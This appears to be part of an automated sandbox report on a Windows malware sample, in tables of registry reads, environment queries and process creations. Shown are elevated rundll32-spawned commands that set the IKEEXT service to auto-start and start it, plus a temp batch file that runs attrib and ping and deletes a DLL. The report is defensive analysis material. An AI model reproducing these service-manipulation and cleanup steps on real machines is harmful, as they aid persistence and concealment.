| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\icacls.exe | os_pid = 0xbf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:35 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 81401 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Information | Value |
|---|---|
| PID | 0xc00 |
| Parent PID | 0xb74 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C04
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xc14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:35 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 81557 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc config ikeext start= auto |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Information | Value |
|---|---|
| PID | 0xc14 |
| Parent PID | 0xc00 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C18
0x
C1C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0x300000 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | service_name = ikeext |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Set Config | service_name = ikeext |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:35 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 81619 |
|
1 |
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c "net start ikeext" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Information | Value |
|---|---|
| PID | 0xc20 |
| Parent PID | 0xb74 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C24
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0xc34, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:36 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 81775 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\system32\net.exe |
| Command Line | net start ikeext |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xc34 |
| Parent PID | 0xc20 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C38
|
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\system32\net1.exe |
| Command Line | C:\Windows\system32\net1 start ikeext |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Information | Value |
|---|---|
| PID | 0xc3c |
| Parent PID | 0xc34 (c:\windows\system32\net.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C40
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 75 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | NETMSG | base_address = 0x6d000000 |
|
1 | |
| Get Handle | c:\windows\system32\net1.exe | base_address = 0x410000 |
|
1 | |
| Get Filename | process_name = c:\windows\system32\net1.exe, file_name_orig = C:\Windows\system32\net1.exe, size = 260 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Display Name | database_name = SERVICES_ACTIVE_DATABASE |
|
2 | |
| Get Service Name | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 2000 milliseconds (2.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2017-10-11 11:01:36 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 81931 |
|
1 |
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" " |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:51, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
| Information | Value |
|---|---|
| PID | 0xcc4 |
| Parent PID | 0xae4 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CC8
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
4 | |
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
4 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
4 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
5 | |
| Get Info | C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Users\BGC6U8~1\AppData\Local | type = file_attributes |
|
1 | |
| Get Info | cmd.exe | type = file_attributes |
|
1 | |
| Get Info | %0 | type = file_attributes |
|
2 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
113 | ||
| Open | STD_INPUT_HANDLE |
|
9 | ||
| Open | STD_INPUT_HANDLE |
|
16 | ||
| Open | STD_INPUT_HANDLE |
|
19 | ||
| Open | STD_ERROR_HANDLE |
|
3 | ||
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 245 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 236 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 174 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 118 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 97 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 27 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 10 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 33 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 6 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 8 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 9 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 | |
| Delete | C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\attrib.exe | os_pid = 0xce0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\PING.EXE | os_pid = 0xce8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xd04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x76512102 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x76513352 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x76513825 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:38 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 84162 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
12 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
7 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
8 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
3 |
| Information | Value |
|---|---|
| ID | #24 |
